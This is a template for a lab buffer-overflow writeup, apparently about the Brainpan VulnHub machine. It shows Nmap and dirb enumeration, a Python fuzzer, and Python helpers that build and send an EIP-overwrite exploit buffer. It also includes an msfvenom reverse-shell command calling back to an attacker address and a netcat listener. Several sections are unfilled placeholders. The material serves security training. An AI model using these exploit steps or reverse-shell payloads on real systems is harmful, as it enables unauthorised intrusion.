Lab (Target Range) Test Writeup Template
Introduction
What is the target environment? What techniques does the attack require? What is the purpose of the exercise?
The exploit development in this post follows these eight steps:
Example:
- Step 1: Fuzzing
- Step 2: Replicating the Crash
- Step 3: Finding the Offset to the EIP Register
- Step 4: Controlling the EIP Register
- Step 5: Finding Space for Shellcode
- Step 6: Finding Bad Characters
- Step 7: Jumping to the ESP Register
- Step 8: Writing the Exploit
Tools Used
A Windows host or virtual machine
A Kali Linux host or virtual machine
OllyDbg
Python
Searchsploit
Firefox
Msfvenom
Methodologies
The penetration testing document must be filled out completely and include the following sections:
- Overall High-Level Summary and Recommendations (non-technical)
- Methodology walkthrough and detailed outline of steps taken
- Each finding, with screenshots, a walkthrough and sample code.
- Any additional items not covered above
Information Gathering
Example:
The first thing to establish is the attacking machine's local network address, using the ip addr command.
Enumeration: Nmap
Because VulnHub virtual machines are downloaded and self-hosted, the machine receives its IP address from DHCP when it boots. Unlike online challenges such as Hack The Box, the target's IP address is therefore not known beforehand.
With the local subnet known from ip addr (or ifconfig), a ping sweep of that subnet locates the target:
nmap -sn 192.168.33.0/24
(-sn is the current name of the host-discovery scan; older writeups spell it -sP, which Nmap still accepts as an alias.)
An initial Nmap scan reveals that ports 9999 and 10000 are open.
nmap -n -sC -sV -Pn -T4 192.168.33.129 -oA nmap/initial
Command explanation:
nmap - network scanner used to discover hosts and the services running on them.
-n - no DNS resolution.
-sC - script scan using the default NSE scripts.
-sV - service version detection.
-Pn - treat the host as online and skip host discovery (necessary for the scan of this machine).
-T4 - aggressive timing template; fine on a lab network.
-oA - write output in all three formats (normal, grepable, XML) using the given base name.
Enumeration: Firefox
Enumeration: dirb
A dirb scan reveals an interesting bin directory.
Enumeration: Firefox
Visiting the bin directory in Firefox reveals a downloadable executable named brainpan.exe.
Debugging: Step 1 Fuzzing
Suspecting that the executable is vulnerable to a buffer overflow, a simple Python fuzzer can be written to test this: it sends increasingly long inputs to the service and records the length at which the service stops responding.
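The fuzzer below is an added example, not the writeup's own script. It sends 'A' buffers of increasing length to a host and port given on the command line (the target address and the port that brainpan.exe listens on are not fixed here; pass your own), and reports the first length at which the service either returns nothing or refuses the connection. To make the block runnable offline it also contains a constructed mock target, start_mock_target, which is a stand-in for the real service and simply stops answering once a line of crash_at bytes or more arrives.

```python
import socket
import sys
import threading
import time


def fuzz_lengths(start=100, step=100, limit=3000):
    """Lengths of the 'A' buffers to send, smallest first."""
    return list(range(start, limit + 1, step))


def send_probe(host, port, length, timeout=3.0):
    """Connect, read the banner, send `length` bytes of 'A' and report whether
    the service still answered. A crashed service either closes the connection
    without replying (recv returns b"") or refuses the connection outright."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        sock.recv(1024)                        # banner / prompt
        sock.sendall(b"A" * length + b"\n")
        return len(sock.recv(1024)) > 0        # b"" means the peer went away
    except OSError:                            # refused, reset or timed out
        return False
    finally:
        sock.close()


def fuzz(host, port, start=100, step=100, limit=3000, delay=0.5):
    """Return the first buffer length at which the service stops responding,
    or None if it survived every probe up to `limit`."""
    for length in fuzz_lengths(start, step, limit):
        if not send_probe(host, port, length):
            return length
        time.sleep(delay)                      # let the target settle between probes
    return None


def start_mock_target(crash_at, host="127.0.0.1"):
    """Constructed stand-in for the target (not brainpan.exe): it answers every
    line shorter than `crash_at` bytes and 'crashes' on the first longer one,
    i.e. replies with nothing and stops accepting connections. Returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))                        # port 0: let the OS pick a free one
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            conn.sendall(b">> ")
            data = b""
            while not data.endswith(b"\n"):    # read one full line
                chunk = conn.recv(65536)
                if not chunk:
                    break
                data += chunk
            crashed = len(data.rstrip(b"\n")) >= crash_at
            if not crashed:
                conn.sendall(b"OK\n")
            conn.close()
            if crashed:
                break                          # simulated crash: no more service
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def run_against_mock(crash_at=600):
    """Fuzz a mock target that dies at `crash_at` bytes; returns the length found."""
    port = start_mock_target(crash_at)
    return fuzz("127.0.0.1", port, start=100, step=100, limit=2000, delay=0)


if __name__ == "__main__":
    if len(sys.argv) == 3:                     # python3 fuzz.py <host> <port>
        print("service stopped responding at", fuzz(sys.argv[1], int(sys.argv[2])))
    else:
        print("mock target died at", run_against_mock())
```

The reported length is only an upper bound on the crash size (the previous probe still worked), which is why Step 2 replicates the crash with a fixed buffer before Step 3 narrows it down to the exact offset.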
Debugging: Setting Up the Debugging Environment
Now that we know the brainpan.exe application is vulnerable to a buffer overflow, it is time to configure the debugging environment to help develop an exploit. Make sure to start OllyDbg as Administrator; a window like the one below should appear.
.
.
.
Debugging: Step 8 Writing the Exploit
It is time to finish the exploit by generating and adding shellcode.
Msfvenom can generate a Windows reverse-shell payload that connects back to a listener on the attacking machine. Make sure to exclude the bad characters found in Step 6 with the -b option. The generated shellcode is 351 bytes long, which fits comfortably in the 522 C's added to the buffer variable.
Note the use of EXITFUNC=thread: when the shell exits, only the thread running the shellcode terminates rather than the whole process, which makes a crash of the host application less likely.
Command explanation:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.33.110 LPORT=4444 EXITFUNC=thread -a x86 --platform linux -b '\x00' -f c > shellcode_linux_test.txt
(This line builds a Linux x86 payload. For the Windows target described above, use -p windows/shell_reverse_tcp --platform windows with the same LHOST, LPORT, -b and -f options.)
msfvenom - payload generator from Rapid7, the makers of Metasploit.
LHOST - attacker IP address.
LPORT - attacker listening port.
Options:
-p, --payload Payload to use. Specify a '-' or stdin to use custom payloads
--payload-options List the payload's standard options
-l, --list [type] List a module type. Options are: payloads, encoders, nops, all
-n, --nopsled Prepend a nopsled of [length] size on to the payload
-f, --format Output format (use --help-formats for a list)
--help-formats List available formats
-e, --encoder The encoder to use
-a, --arch The architecture to use
--platform The platform of the payload
--help-platforms List available platforms
-s, --space The maximum size of the resulting payload
--encoder-space The maximum size of the encoded payload (defaults to the -s value)
-b, --bad-chars The list of characters to avoid example: '\x00\xff'
-i, --iterations The number of times to encode the payload
-c, --add-code Specify an additional win32 shellcode file to include
-x, --template Specify a custom executable file to use as a template
-k, --keep Preserve the template behavior and inject the payload as a new thread
-o, --out Save the payload
-v, --var-name Specify a custom variable name to use for certain output formats
--smallest Generate the smallest possible payload
-h, --help Show this message
nc -nvlp 4444
nc - netcat, a TCP/UDP tool for making and listening for connections.
-n - numeric addresses only, no DNS resolution.
-v - verbose output.
-l - listen for incoming connections.
-p - local port number.
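The block below is an added example, not the writeup's exploit, collecting the small pieces of Python that Steps 3, 6 and 8 rely on: a Metasploit-style cyclic pattern and the lookup that turns the EIP value seen in OllyDbg into an offset, the bad-character probe with the comparison against the debugger's memory dump, and the final buffer assembly that checks the shellcode and the return address against the bad-character list and the available space before sending. The offset, JMP ESP address and shellcode in the demo are hypothetical stand-ins (the real ones come from Steps 3 and 7 and from msfvenom); the 522-byte space and the 351-byte shellcode length are the figures given above.

```python
import socket
import struct


# --- Step 3: locate the offset to EIP with a cyclic pattern ---
def cyclic_pattern(length):
    """Same sequence as msf-pattern_create: Aa0Aa1Aa2 ... Zz9. Any 4-byte slice
    identifies its own position, so the value in EIP pins down the offset."""
    out = bytearray()
    for upper in range(ord("A"), ord("Z") + 1):
        for lower in range(ord("a"), ord("z") + 1):
            for digit in range(ord("0"), ord("9") + 1):
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(pattern, eip_value):
    """eip_value is the 32-bit value the debugger shows in EIP, as an int.
    x86 is little-endian, so its bytes appear reversed in the pattern."""
    idx = pattern.find(struct.pack("<I", eip_value))
    return None if idx < 0 else idx


# --- Step 6: find bad characters ---
def badchar_probe(known_bad=frozenset({0x00})):
    """Every byte value except those already known to be bad; placed after the
    EIP overwrite so the copy on the stack can be inspected in the debugger."""
    return bytes(b for b in range(256) if b not in known_bad)


def first_divergence(sent, dumped):
    """Index of the first byte where the debugger's memory dump differs from
    what was sent; sent[index] is the next bad character to exclude."""
    for i, (a, b) in enumerate(zip(sent, dumped)):
        if a != b:
            return i
    return None


def contains_badchars(blob, badchars):
    """Sorted list of bad byte values present in blob (empty list = clean)."""
    return sorted({b for b in blob if b in badchars})


# --- Step 8: assemble the final buffer ---
def build_exploit(offset, jmp_esp, shellcode, space, badchars, nops=16):
    """offset: bytes before EIP (Step 3); jmp_esp: address of a JMP ESP in a
    module without ASLR/rebasing (Step 7); space: bytes usable after EIP (Step 5).
    Layout: 'A' * offset | JMP ESP address | NOP sled | shellcode | 'C' filler."""
    bad = contains_badchars(shellcode, badchars)
    if bad:
        raise ValueError("shellcode contains bad chars: %r (regenerate with -b)" % bad)
    ret = struct.pack("<I", jmp_esp)            # little-endian, lands in EIP
    if contains_badchars(ret, badchars):
        raise ValueError("JMP ESP address contains a bad char; pick another")
    payload = b"\x90" * nops + shellcode        # short NOP sled, then shellcode
    if len(payload) > space:
        raise ValueError("need %d bytes but only %d available" % (len(payload), space))
    return b"A" * offset + ret + payload + b"C" * (space - len(payload))


def send_exploit(host, port, buf, timeout=5.0):
    """Deliver the buffer the same way the fuzzer did (banner first, then a line)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.recv(1024)
        sock.sendall(buf + b"\n")


if __name__ == "__main__":
    # Hypothetical values for illustration only; the real offset, JMP ESP
    # address and shellcode come from Steps 3 and 7 and from msfvenom.
    shellcode = b"\xcc" * 351                   # stand-in, same length as the page's
    buf = build_exploit(offset=500, jmp_esp=0x11223344, shellcode=shellcode,
                        space=522, badchars={0x00})
    print("buffer is %d bytes; EIP slot = %s" % (len(buf), buf[500:504].hex()))
```

Replace the stand-in shellcode with the byte string msfvenom emits, keep badchars in sync with the -b list given to msfvenom, and call send_exploit against the target while the netcat listener from above is running.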
Exploitation: Initial Shell
……
Privilege Escalation
…..
Exploitation: System
…..
Exploitation: Root
……
Conclusion
This challenge helped me understand the process behind xxx and what goes on under the xxx a lot better. Documenting the process ……